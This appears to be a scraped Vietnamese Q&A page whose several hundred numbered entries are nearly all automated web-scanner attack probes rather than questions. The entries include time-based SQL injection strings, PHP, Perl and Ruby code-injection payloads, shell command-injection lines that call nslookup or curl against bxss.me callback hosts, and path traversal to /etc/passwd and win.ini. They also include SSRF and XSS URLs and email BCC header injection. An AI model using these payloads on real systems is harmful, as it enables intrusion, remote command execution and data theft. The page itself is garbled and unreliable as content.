Hỏi & đáp

1. 9162617
2. @@NnnM8
3. ����%2527%2522\'\"
4. '"
5. (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
6. 0"XOR( *if(now()=sysdate(),sleep(15),0))XOR"Z
7. 0'XOR( *if(now()=sysdate(),sleep(15),0))XOR'Z
8. *if(now()=sysdate(),sleep(15),0)
9. '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
10. *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
11. SjWUBbiJ')) OR 974=(SELECT 974 FROM PG_SLEEP(15))--
12. pE1gSCS3') OR 979=(SELECT 979 FROM PG_SLEEP(15))--
13. @@Rn5fW
14. ����%2527%2522\'\"
15. '"
16. (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
17. 3JIg5JQp' OR 975=(SELECT 975 FROM PG_SLEEP(15))--
18. 0"XOR( *if(now()=sysdate(),sleep(15),0))XOR"Z
19. @@DTxGG
20. ����%2527%2522\'\"
21. '"
22. (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
23. -1)) OR 713=(SELECT 713 FROM PG_SLEEP(15))--
24. 0'XOR( *if(now()=sysdate(),sleep(15),0))XOR'Z
25. 0"XOR( *if(now()=sysdate(),sleep(15),0))XOR"Z
26. -1) OR 214=(SELECT 214 FROM PG_SLEEP(15))--
27. *if(now()=sysdate(),sleep(15),0)
28. 0'XOR( *if(now()=sysdate(),sleep(15),0))XOR'Z
29. -1 OR 962=(SELECT 962 FROM PG_SLEEP(15))--
30. '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
31. *if(now()=sysdate(),sleep(15),0)
32. id4M1nrr')); waitfor delay '0:0:15' --
33. *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
34. '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
35. lBK19nZh'); waitfor delay '0:0:15' --
36. u9geAb9s')) OR 522=(SELECT 522 FROM PG_SLEEP(15))--
37. BQQSVYme') OR 246=(SELECT 246 FROM PG_SLEEP(15))--
38. -1 waitfor delay '0:0:15' --
39. YYrPdbUZ' OR 729=(SELECT 729 FROM PG_SLEEP(15))--
40. o8IpOQk5') OR 686=(SELECT 686 FROM PG_SLEEP(15))--
41. -1)); waitfor delay '0:0:15' --
42. -1)) OR 363=(SELECT 363 FROM PG_SLEEP(15))--
43. klZS3ujh' OR 83=(SELECT 83 FROM PG_SLEEP(15))--
44. -1); waitfor delay '0:0:15' --
45. -1) OR 883=(SELECT 883 FROM PG_SLEEP(15))--
46. -1)) OR 226=(SELECT 226 FROM PG_SLEEP(15))--
47. -1; waitfor delay '0:0:15' --
48. -1 OR 423=(SELECT 423 FROM PG_SLEEP(15))--
49. -1) OR 162=(SELECT 162 FROM PG_SLEEP(15))--
50. -1" OR 2+91-91-1=0+0+0+1 --
51. -1' OR 2+165-165-1=0+0+0+1 or 'bQDlygGT'='
52. -1' OR 2+804-804-1=0+0+0+1 --
53. -1 OR 2+351-351-1=0+0+0+1
54. -1 OR 2+204-204-1=0+0+0+1 --
55.
56. 8PDIrxPQ')); waitfor delay '0:0:15' --
57. -1 OR 798=(SELECT 798 FROM PG_SLEEP(15))--
58. BZM68JRS
59. PdwbHcDS')); waitfor delay '0:0:15' --
60.
61. oJk4chwn'; waitfor delay '0:0:15' --
62. v7kkfpxy'); waitfor delay '0:0:15' --
63.
64. -1 waitfor delay '0:0:15' --
65. dVOr7CUs'; waitfor delay '0:0:15' --
66. -1)); waitfor delay '0:0:15' --
67. -1)); waitfor delay '0:0:15' --
68. -1; waitfor delay '0:0:15' --
69. -1); waitfor delay '0:0:15' --
70. -1" OR 2+663-663-1=0+0+0+1 --
71. -1' OR 2+917-917-1=0+0+0+1 or '0WQuLavo'='
72. -1' OR 2+630-630-1=0+0+0+1 --
73. -1 OR 2+173-173-1=0+0+0+1
74. -1 OR 2+89-89-1=0+0+0+1 --
75.
76. -1; waitfor delay '0:0:15' --
77. vnjdW5f1
78. -1" OR 2+91-91-1=0+0+0+1 --
79. -1' OR 3*2>(0+5+128-128) or 'hjHcoEXJ'='
80. -1' OR 3*2<(0+5+128-128) or 'hjHcoEXJ'='
81. -1' OR 3+128-128-1=0+0+0+1 or 'hjHcoEXJ'='
82.
83.
84.
85.
86.
87.
88.
@@fjwGq
89.
����%2527%2522\'\"
90.
'"
91.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
92.
0"XOR( *if(now()=sysdate(),sleep(15),0))XOR"Z
93.
0'XOR( *if(now()=sysdate(),sleep(15),0))XOR'Z
94.
*if(now()=sysdate(),sleep(15),0)
95.
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
96.
97.
98.
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
99.
@@fVt2B
100.
����%2527%2522\'\"
101.
'"
102.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
103.
B0S2KBRs')) OR 957=(SELECT 957 FROM PG_SLEEP(15))--
104.
105.
0"XOR( *if(now()=sysdate(),sleep(15),0))XOR"Z
106.
Sarureef') OR 117=(SELECT 117 FROM PG_SLEEP(15))--
107.
108.
0'XOR( *if(now()=sysdate(),sleep(15),0))XOR'Z
109.
Nh6PnCi6' OR 857=(SELECT 857 FROM PG_SLEEP(15))--
110.
@@vzbFr
111.
����%2527%2522\'\"
112.
'"
113.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
114.
*if(now()=sysdate(),sleep(15),0)
115.
-1)) OR 895=(SELECT 895 FROM PG_SLEEP(15))--
116.
0"XOR( *if(now()=sysdate(),sleep(15),0))XOR"Z
117.
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
118.
-1) OR 786=(SELECT 786 FROM PG_SLEEP(15))--
119.
0'XOR( *if(now()=sysdate(),sleep(15),0))XOR'Z
120.
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
121.
-1 OR 364=(SELECT 364 FROM PG_SLEEP(15))--
122.
*if(now()=sysdate(),sleep(15),0)
123.
ZEebKylS')) OR 619=(SELECT 619 FROM PG_SLEEP(15))--
124.
eCf02x7N')); waitfor delay '0:0:15' --
125.
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
126.
LaamLmIF') OR 967=(SELECT 967 FROM PG_SLEEP(15))--
127.
bYKTHdTi'); waitfor delay '0:0:15' --
128.
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
129.
UyaN4Cbc' OR 950=(SELECT 950 FROM PG_SLEEP(15))--
130.
Qcze3hpb'; waitfor delay '0:0:15' --
131.
WVae6x4D')) OR 668=(SELECT 668 FROM PG_SLEEP(15))--
132.
-1)) OR 823=(SELECT 823 FROM PG_SLEEP(15))--
133.
-1 waitfor delay '0:0:15' --
134.
fT1PswOa') OR 371=(SELECT 371 FROM PG_SLEEP(15))--
135.
-1) OR 394=(SELECT 394 FROM PG_SLEEP(15))--
136.
-1)); waitfor delay '0:0:15' --
137.
UhbN0LkE' OR 507=(SELECT 507 FROM PG_SLEEP(15))--
138.
-1 OR 666=(SELECT 666 FROM PG_SLEEP(15))--
139.
-1); waitfor delay '0:0:15' --
140.
-1)) OR 403=(SELECT 403 FROM PG_SLEEP(15))--
141.
PrUqOoUA')); waitfor delay '0:0:15' --
142.
-1; waitfor delay '0:0:15' --
143.
-1) OR 537=(SELECT 537 FROM PG_SLEEP(15))--
144.
GypoGYcA'); waitfor delay '0:0:15' --
145.
-1" OR 2+143-143-1=0+0+0+1 --
146.
-1' OR 2+777-777-1=0+0+0+1 or 'BbuASDze'='
147.
-1' OR 2+89-89-1=0+0+0+1 --
148.
-1 OR 2+817-817-1=0+0+0+1
149.
-1 OR 2+181-181-1=0+0+0+1 --
150.
151.
-1 OR 792=(SELECT 792 FROM PG_SLEEP(15))--
152.
g1iHObsV'; waitfor delay '0:0:15' --
153.
hGmdP9wV
154.
gDSj0EiF')); waitfor delay '0:0:15' --
155.
-1 waitfor delay '0:0:15' --
156.
157.
mfTAkSwC'); waitfor delay '0:0:15' --
158.
-1)); waitfor delay '0:0:15' --
159.
160.
S2sWkqhz'; waitfor delay '0:0:15' --
161.
-1); waitfor delay '0:0:15' --
162.
163.
164.
-1 waitfor delay '0:0:15' --
165.
-1; waitfor delay '0:0:15' --
166.
167.
-1)); waitfor delay '0:0:15' --
168.
-1" OR 2+432-432-1=0+0+0+1 --
169.
-1' OR 2+617-617-1=0+0+0+1 or 'BWc7UsLg'='
170.
-1' OR 2+150-150-1=0+0+0+1 --
171.
-1 OR 2+826-826-1=0+0+0+1
172.
-1 OR 2+137-137-1=0+0+0+1 --
173.
174.
175.
-1); waitfor delay '0:0:15' --
176.
n6LobMj6
177.
-1; waitfor delay '0:0:15' --
178.
179.
180.
-1" OR 2+349-349-1=0+0+0+1 --
181.
-1' OR 2+105-105-1=0+0+0+1 or 'WplG2sAN'='
182.
-1' OR 2+102-102-1=0+0+0+1 --
183.
-1 OR 2+27-27-1=0+0+0+1
184.
-1 OR 2+225-225-1=0+0+0+1 --
185.
186.
187.
qV67QnNL
188.
189.
190.
191.
192.
193.
194.
195.
196.
197.
198.
199.
200.
201.
202.
203.
204.
205.
206.
207.
208.
209.
210.
211.
212.
213.
214.
215.
216.
217.
218.
219.
220.
221.
222.
223.
224.
225.
226.
227.
228.
229.
230.
231.
232.
233.
234.
235.
236.
237.
238.
239.
240.
241.
242.
243.
244.
245.
246.
247.
248.
249.
250.
251.
252.
253.
254.
255.
256.
257.
258.
259.
260.
261.
262.
263. '||sleep(27*1000)*phqykd||'
264. "&&sleep(27*1000)*xlbpqa&&"
265.
266.
267.
268.
269.
270.
271.
272.
273.
274.
275.
276.
277.
278.
279.
'||sleep(27*1000)*htrqza||'
280. ${@print(md5(31337))}
281.
282.
'"()
283.
284.
285. ";print(md5(31337));$a="
286.
287. ';print(md5(31337));$a='
288.
289.
'.print(md5(31337)).'
290.
${@print(md5(31337))}\
291.
292.
";print(md5(31337));$a="
293.
294.
';print(md5(31337));$a='
295.
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
296.
297.
298.
299.
300.
301. /\xfs.bxss.me?gov.vn
302.
303.
304.
305.
306.
307. //xfs.bxss.me?gov.vn
308.
309. xfs.bxss.me?gov.vn
310.
311.
312. http://xfs.bxss.me?gov.vn
313.
314.
315. 939614
316.
317.
9534725
318.
319. ".gethostbyname(lc("hitzn"."qvfnkuni77735.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(70).chr(106).chr(80)."
320.
321. '.gethostbyname(lc('hitfr'.'xgufxmefd06b4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(85).chr(102).chr(78).'
322.
323.
324.
325.
326.
".gethostbyname(lc("hitqq"."zwgbzvubbdf46.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(65).chr(103).chr(81)."
327.
328. xfs.bxss.me
329.
'.gethostbyname(lc('hitsy'.'pojlqamv15117.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(75).chr(103).chr(77).'
330.
331.
332. QA_Add/.
333. QA_Add
334.
335. QA_Add
336.
337.
338.
339.
340.
341. '+'A'.concat(70-3).concat(22*4).concat(102).concat(72).concat(102).concat(77)+(require'socket' Socket.gethostbyname('hitfi'+'tucwftqu15e01.bxss.me.')[3].to_s)+'
342.
/\xfs.bxss.me?gov.vn
343. "+"A".concat(70-3).concat(22*4).concat(110).concat(84).concat(114).concat(78)+(require"socket" Socket.gethostbyname("hitpu"+"cczlactd98185.bxss.me.")[3].to_s)+"
344.
345.
QA_Add/.
346.
//xfs.bxss.me?gov.vn
347.
QA_Add
348.
QA_Add
349.
350.
351.
xfs.bxss.me?gov.vn
352.
http://xfs.bxss.me?gov.vn
353.
912103
354.
xfs.bxss.me
355.
356.
357. bxss.me/t/xss.html?%00
358. ;(nslookup -q=cname hitccotmoeqkb0a194.bxss.me||curl hitccotmoeqkb0a194.bxss.me)|(nslookup -q=cname hitccotmoeqkb0a194.bxss.me||curl hitccotmoeqkb0a194.bxss.me)&(nslookup -q=cname hitccotmoeqkb0a194.bxss.me||curl hitccotmoeqkb0a194.bxss.me)
359. `(nslookup -q=cname hitcjugusjzxge0018.bxss.me||curl hitcjugusjzxge0018.bxss.me)`
360. |(nslookup -q=cname hitpnxjxtzkrkac89f.bxss.me||curl hitpnxjxtzkrkac89f.bxss.me)
361. &(nslookup -q=cname hitgfvdilqzpp5fe78.bxss.me||curl hitgfvdilqzpp5fe78.bxss.me)&'\"`0&(nslookup -q=cname hitgfvdilqzpp5fe78.bxss.me||curl hitgfvdilqzpp5fe78.bxss.me)&`'
362. &nslookup -q=cname hitrblksbxjzod61c4.bxss.me&'\"`0&nslookup -q=cname hitrblksbxjzod61c4.bxss.me&`'
363. HttP://bxss.me/t/xss.html?%00
364. $(nslookup -q=cname hityakgsiibqtb56a6.bxss.me||curl hityakgsiibqtb56a6.bxss.me)
365. bxss.me
366. c:/windows/win.ini
367. /etc/shells
368. http://bxss.me/t/fit.txt?.jpg
369. Http://bxss.me/t/fit.txt
370. (nslookup -q=cname hitgacoxzsdog94364.bxss.me||curl hitgacoxzsdog94364.bxss.me))
371. 1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
372.
'+'A'.concat(70-3).concat(22*4).concat(119).concat(79).concat(114).concat(74)+(require'socket' Socket.gethostbyname('hitpk'+'wrmmnkyj00c82.bxss.me.')[3].to_s)+'
373. http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
374.
"+"A".concat(70-3).concat(22*4).concat(117).concat(84).concat(102).concat(74)+(require"socket" Socket.gethostbyname("hitqb"+"feemvwpna3f39.bxss.me.")[3].to_s)+"
375. |echo aurxqz$()\ fzrvzs\nz^xyu||a #' |echo aurxqz$()\ fzrvzs\nz^xyu||a #|" |echo aurxqz$()\ fzrvzs\nz^xyu||a #
376. &echo opccbr$()\ ltzakq\nz^xyu||a #' &echo opccbr$()\ ltzakq\nz^xyu||a #|" &echo opccbr$()\ ltzakq\nz^xyu||a #
377. echo bqcxfm$()\ wlbpku\nz^xyu||a #' &echo bqcxfm$()\ wlbpku\nz^xyu||a #|" &echo bqcxfm$()\ wlbpku\nz^xyu||a #
378.
bxss.me/t/xss.html?%00
379.
380.
HttP://bxss.me/t/xss.html?%00
381.
382.
383.
384.
385.
386. "+response.write(9434454*9862121)+"
387. '+response.write(9434454*9862121)+'
388. response.write(9434454*9862121)
389. ctime sleep p0 (I30 tp1 Rp2 .
390.
ctime sleep p0 (I30 tp1 Rp2 .
391.
;(nslookup -q=cname hitxibibulkshfc26d.bxss.me||curl hitxibibulkshfc26d.bxss.me)|(nslookup -q=cname hitxibibulkshfc26d.bxss.me||curl hitxibibulkshfc26d.bxss.me)&(nslookup -q=cname hitxibibulkshfc26d.bxss.me||curl hitxibibulkshfc26d.bxss.me)
392.
`(nslookup -q=cname hitvferwyvvgge756d.bxss.me||curl hitvferwyvvgge756d.bxss.me)`
393.
bxss.me
394.
|(nslookup -q=cname hitgnqqquzpgj55b36.bxss.me||curl hitgnqqquzpgj55b36.bxss.me)
395. '"
396.
&(nslookup -q=cname hitvuzwgfhldtd5d00.bxss.me||curl hitvuzwgfhldtd5d00.bxss.me)&'\"`0&(nslookup -q=cname hitvuzwgfhldtd5d00.bxss.me||curl hitvuzwgfhldtd5d00.bxss.me)&`'
397.
398.
&nslookup -q=cname hitppdwluzdjd84058.bxss.me&'\"`0&nslookup -q=cname hitppdwluzdjd84058.bxss.me&`'
399.
c:/windows/win.ini
400.
'"
401.
"+response.write(9068232*9620353)+"
402.
/etc/shells
403.
'+response.write(9068232*9620353)+'
404.
response.write(9068232*9620353)
405.
http://bxss.me/t/fit.txt?.jpg
406.
$(nslookup -q=cname hitrvggaqazyg8a6a5.bxss.me||curl hitrvggaqazyg8a6a5.bxss.me)
407.
Http://bxss.me/t/fit.txt
408.
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
409.
(nslookup -q=cname hitcxqyayxvsf3bd11.bxss.me||curl hitcxqyayxvsf3bd11.bxss.me))
410.
411.
|echo eaeekk$()\ llodvj\nz^xyu||a #' |echo eaeekk$()\ llodvj\nz^xyu||a #|" |echo eaeekk$()\ llodvj\nz^xyu||a #
412.
&echo sxazpt$()\ cicmth\nz^xyu||a #' &echo sxazpt$()\ cicmth\nz^xyu||a #|" &echo sxazpt$()\ cicmth\nz^xyu||a #
413.
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
414.
415.
echo gsvvdx$()\ bjkzki\nz^xyu||a #' &echo gsvvdx$()\ bjkzki\nz^xyu||a #|" &echo gsvvdx$()\ bjkzki\nz^xyu||a #
416. ^(#$!@#$)(()))******
417. !(()&&!|*|*|
418. )
419.
420.
421.
422. ../
423.
424.
425.
426. file:///etc/passwd
427.
428.
^(#$!@#$)(()))******
429.
!(()&&!|*|*|
430. ../../../../../../../../../../../../../../windows/win.ini
431.
)
432. ../../../../../../../../../../../../../../etc/passwd
433.
434.
435.
436.
437.
438.
439.
440.
441.
442. ${9999567+9999546}
443.
444.
bcc:0.216-174998.216.7e0f8.19789.2@bxss.me
445.
446.
447.
448.
449.
450.
451.
452.
453.
454.
455.
456. "||sleep(27*1000)*ydnykq||"
457.
458. '||sleep(27*1000)*olhgpe||'
459. "&&sleep(27*1000)*ckwcad&&"
460. '&&sleep(27*1000)*nvxysu&&'
461. '"()
462.
463.
464.
465.
466.
467. '.print(md5(31337)).'
468. ${@print(md5(31337))}\
469. ${@print(md5(31337))}
470. ";print(md5(31337));$a="
471. ';print(md5(31337));$a='
472. ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
473.
474.
475.
476.
477.
478.
'.print(md5(31337)).'
479.
${@print(md5(31337))}\
480.
481. 9290450
482.
${@print(md5(31337))}
483.
";print(md5(31337));$a="
484.
485.
';print(md5(31337));$a='
486.
"||sleep(27*1000)*agjyjw||"
487.
'||sleep(27*1000)*evopng||'
488.
"&&sleep(27*1000)*dilrbn&&"
489.
'&&sleep(27*1000)*faudxb&&'
490. ;(nslookup -q=cname hithsizgxfwtw85f15.bxss.me||curl hithsizgxfwtw85f15.bxss.me)|(nslookup -q=cname hithsizgxfwtw85f15.bxss.me||curl hithsizgxfwtw85f15.bxss.me)&(nslookup -q=cname hithsizgxfwtw85f15.bxss.me||curl hithsizgxfwtw85f15.bxss.me)
491.
'"()
492.
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
493. `(nslookup -q=cname hitzmldzckeud9e18a.bxss.me||curl hitzmldzckeud9e18a.bxss.me)`
494.
495. |(nslookup -q=cname hitfqnutheqdx34535.bxss.me||curl hitfqnutheqdx34535.bxss.me)
496.
497. &(nslookup -q=cname hitdmghwroglo7a3f8.bxss.me||curl hitdmghwroglo7a3f8.bxss.me)&'\"`0&(nslookup -q=cname hitdmghwroglo7a3f8.bxss.me||curl hitdmghwroglo7a3f8.bxss.me)&`'
498. &nslookup -q=cname hitqrawhaqoap10900.bxss.me&'\"`0&nslookup -q=cname hitqrawhaqoap10900.bxss.me&`'
499. $(nslookup -q=cname hitbctykwzojn983bd.bxss.me||curl hitbctykwzojn983bd.bxss.me)
500.
501.
502. (nslookup -q=cname hitvjldangpva20f51.bxss.me||curl hitvjldangpva20f51.bxss.me))
503.
504. |echo nyskeo$()\ iywygf\nz^xyu||a #' |echo nyskeo$()\ iywygf\nz^xyu||a #|" |echo nyskeo$()\ iywygf\nz^xyu||a #
505.
506.
507. &echo qwdmwb$()\ tdfysh\nz^xyu||a #' &echo qwdmwb$()\ tdfysh\nz^xyu||a #|" &echo qwdmwb$()\ tdfysh\nz^xyu||a #
508. echo ndxkkx$()\ enqudj\nz^xyu||a #' &echo ndxkkx$()\ enqudj\nz^xyu||a #|" &echo ndxkkx$()\ enqudj\nz^xyu||a #
509.
510.
511.
512.
513.
514.
515.
516. /\xfs.bxss.me?gov.vn
517. ".gethostbyname(lc("hituz"."fpiwifjk82311.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(70).chr(108).chr(75)."
518.
519. '.gethostbyname(lc('hitls'.'mkjkyufmd52da.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(68).chr(119).chr(87).'
520.
521.
522. //xfs.bxss.me?gov.vn
523.
9374695
524.
525. xfs.bxss.me?gov.vn
526.
527.
528.
529. bxss.me
530.
".gethostbyname(lc("hitlx"."hmdxrrwj9d761.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(67).chr(102).chr(78)."
531.
532. http://xfs.bxss.me?gov.vn
533.
534.
535. 910250
536.
'.gethostbyname(lc('hitvl'.'dwhlytjg900a7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(70).chr(116).chr(86).'
537.
538. c:/windows/win.ini
539.
540. /etc/shells
541. xfs.bxss.me
542.
543.
544.
545.
546.
547.
548.
549.
550.
551. http://bxss.me/t/fit.txt?.jpg
552.
553. Http://bxss.me/t/fit.txt
554.
555.
;(nslookup -q=cname hitpnuxnwaasx0b337.bxss.me||curl hitpnuxnwaasx0b337.bxss.me)|(nslookup -q=cname hitpnuxnwaasx0b337.bxss.me||curl hitpnuxnwaasx0b337.bxss.me)&(nslookup -q=cname hitpnuxnwaasx0b337.bxss.me||curl hitpnuxnwaasx0b337.bxss.me)
556.
557. QA_Add/.
558.
559. QA_Add
560. bxss.me/t/xss.html?%00
561.
`(nslookup -q=cname hitiucebycrjw6e952.bxss.me||curl hitiucebycrjw6e952.bxss.me)`
562. QA_Add
563. 1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
564. http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
565. HttP://bxss.me/t/xss.html?%00
566.
567.
|(nslookup -q=cname hitrmpauxdbrdfe5f4.bxss.me||curl hitrmpauxdbrdfe5f4.bxss.me)
568.
569.
&(nslookup -q=cname hitnovbizcogwd3618.bxss.me||curl hitnovbizcogwd3618.bxss.me)&'\"`0&(nslookup -q=cname hitnovbizcogwd3618.bxss.me||curl hitnovbizcogwd3618.bxss.me)&`'
570.
/\xfs.bxss.me?gov.vn
571.
&nslookup -q=cname hitdrafwycfgxcd235.bxss.me&'\"`0&nslookup -q=cname hitdrafwycfgxcd235.bxss.me&`'
572.
573.
574.
QA_Add/.
575.
bxss.me/t/xss.html?%00
576.
577.
$(nslookup -q=cname hitonzuxcdsld6245a.bxss.me||curl hitonzuxcdsld6245a.bxss.me)
578.
QA_Add
579.
HttP://bxss.me/t/xss.html?%00
580.
//xfs.bxss.me?gov.vn
581. '+'A'.concat(70-3).concat(22*4).concat(111).concat(85).concat(101).concat(69)+(require'socket' Socket.gethostbyname('hitdt'+'qivoglcsb58fd.bxss.me.')[3].to_s)+'
582.
xfs.bxss.me?gov.vn
583. "+"A".concat(70-3).concat(22*4).concat(104).concat(73).concat(97).concat(83)+(require"socket" Socket.gethostbyname("hitqc"+"hhpurjoo21154.bxss.me.")[3].to_s)+"
584.
585.
(nslookup -q=cname hitznoqmovdhi4d6c8.bxss.me||curl hitznoqmovdhi4d6c8.bxss.me))
586.
http://xfs.bxss.me?gov.vn
587.
'+'A'.concat(70-3).concat(22*4).concat(122).concat(74).concat(108).concat(70)+(require'socket' Socket.gethostbyname('hitgr'+'rpfrpngx41ad0.bxss.me.')[3].to_s)+'
588.
QA_Add
589.
922903
590.
|echo cyxtts$()\ sshkrh\nz^xyu||a #' |echo cyxtts$()\ sshkrh\nz^xyu||a #|" |echo cyxtts$()\ sshkrh\nz^xyu||a #
591.
bxss.me
592.
"+"A".concat(70-3).concat(22*4).concat(118).concat(81).concat(104).concat(82)+(require"socket" Socket.gethostbyname("hitlq"+"enlbglhh57cf6.bxss.me.")[3].to_s)+"
593.
&echo aduort$()\ iqcnxq\nz^xyu||a #' &echo aduort$()\ iqcnxq\nz^xyu||a #|" &echo aduort$()\ iqcnxq\nz^xyu||a #
594.
595.
c:/windows/win.ini
596.
xfs.bxss.me
597.
598.
599.
600.
/etc/shells
601.
602.
echo jfujvs$()\ lvrdpw\nz^xyu||a #' &echo jfujvs$()\ lvrdpw\nz^xyu||a #|" &echo jfujvs$()\ lvrdpw\nz^xyu||a #
603.
604.
605.
http://bxss.me/t/fit.txt?.jpg
606. ^(#$!@#$)(()))******
607.
608.
Http://bxss.me/t/fit.txt
609.
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
610.
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
611. '"
612. !(()&&!|*|*|
613. "+response.write(9560050*9585621)+"
614. ctime sleep p0 (I30 tp1 Rp2 .
615.
ctime sleep p0 (I30 tp1 Rp2 .
616. '+response.write(9560050*9585621)+'
617. ../
618. )
619.
620. response.write(9560050*9585621)
621. file:///etc/passwd
622. ../../../../../../../../../../../../../../windows/win.ini
623.
'"
624. ../../../../../../../../../../../../../../etc/passwd
625.
626.
^(#$!@#$)(()))******
627.
628.
"+response.write(9128669*9723625)+"
629.
630.
!(()&&!|*|*|
631.
632.
'+response.write(9128669*9723625)+'
633.
634.
635.
636.
637.
638.
639.
file:///etc/passwd
640.
641.
642.
643.
644.
../../../../../../../../../../../../../../windows/win.ini
645.
646.
647.
648.
../../../../../../../../../../../../../../etc/passwd
649.
650.
651.
652.
653. to@example.com> bcc:0.216-174485.216.7e0f8.19789.2@bxss.me
654.
655. bcc:0.216-174484.216.7e0f8.19789.2@bxss.me
656.
657.
658.
12345'"\'\");|]*{ <>�''💡
659. /../../../../../../../../../../windows/system32/BITSADMIN.exe
660.
661.
662.
663.
bcc:0.216-174480.216.7e0f8.19789.2@bxss.me
664.
665.
666.
667.
668. "||sleep(27*1000)*dwshym||"
669.
670.
671.
672.
673. '||sleep(27*1000)*bklcch||'
674.
675.
676.
677. "&&sleep(27*1000)*uihsvj&&"
678.
679.
680. '.print(md5(31337)).'
681.
682. '"()
683.
684. ${@print(md5(31337))}
685.
686.
687. ";print(md5(31337));$a="
688.
689. ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
690.
691.
692.
693.
694.
"||sleep(27*1000)*iwzfcb||"
695.
'.print(md5(31337)).'
696.
'||sleep(27*1000)*gzisjp||'
697.
${@print(md5(31337))}\
698.
"&&sleep(27*1000)*zrysjt&&"
699.
'&&sleep(27*1000)*iulwnp&&'
700.
${@print(md5(31337))}
701.
'"()
702.
703.
704.
";print(md5(31337));$a="
705.
706.
707.
';print(md5(31337));$a='
708. bxss.me
709.
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
710.
711. c:/windows/win.ini
712.
713.
714. /etc/shells
715. http://bxss.me/t/fit.txt?.jpg
716.
717. /\xfs.bxss.me?gov.vn
718.
719.
720. Http://bxss.me/t/fit.txt
721. ".gethostbyname(lc("hitsr"."zlrhbqcz775a1.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(81).chr(99).chr(82)."
722. //xfs.bxss.me?gov.vn
723. 1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
724.
725. http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
726.
727. xfs.bxss.me?gov.vn
728.
729. '.gethostbyname(lc('hitvd'.'gqmcarpq4a535.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(65).chr(121).chr(90).'
730. http://xfs.bxss.me?gov.vn
731. 954983
732. ;(nslookup -q=cname hitstlnttqnqj3be84.bxss.me||curl hitstlnttqnqj3be84.bxss.me)|(nslookup -q=cname hitstlnttqnqj3be84.bxss.me||curl hitstlnttqnqj3be84.bxss.me)&(nslookup -q=cname hitstlnttqnqj3be84.bxss.me||curl hitstlnttqnqj3be84.bxss.me)
733.
734. xfs.bxss.me
735.
736. `(nslookup -q=cname hitftibkcmtpd6b427.bxss.me||curl hitftibkcmtpd6b427.bxss.me)`
737.
738.
739. |(nslookup -q=cname hitrhcyzlasaiea3b7.bxss.me||curl hitrhcyzlasaiea3b7.bxss.me)
740.
741.
742.
743.
".gethostbyname(lc("hitkm"."frhxkpgt2a2a2.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(65).chr(113).chr(88)."
744.
745. &(nslookup -q=cname hitleafwkvixs99a78.bxss.me||curl hitleafwkvixs99a78.bxss.me)&'\"`0&(nslookup -q=cname hitleafwkvixs99a78.bxss.me||curl hitleafwkvixs99a78.bxss.me)&`'
746.
9813118
747. QA_Add/.
748.
749. QA_Add
750.
751. &nslookup -q=cname hitwuphfqmooy4890b.bxss.me&'\"`0&nslookup -q=cname hitwuphfqmooy4890b.bxss.me&`'
752.
'.gethostbyname(lc('hital'.'wdyloakj5892f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(75).chr(118).chr(69).'
753. QA_Add
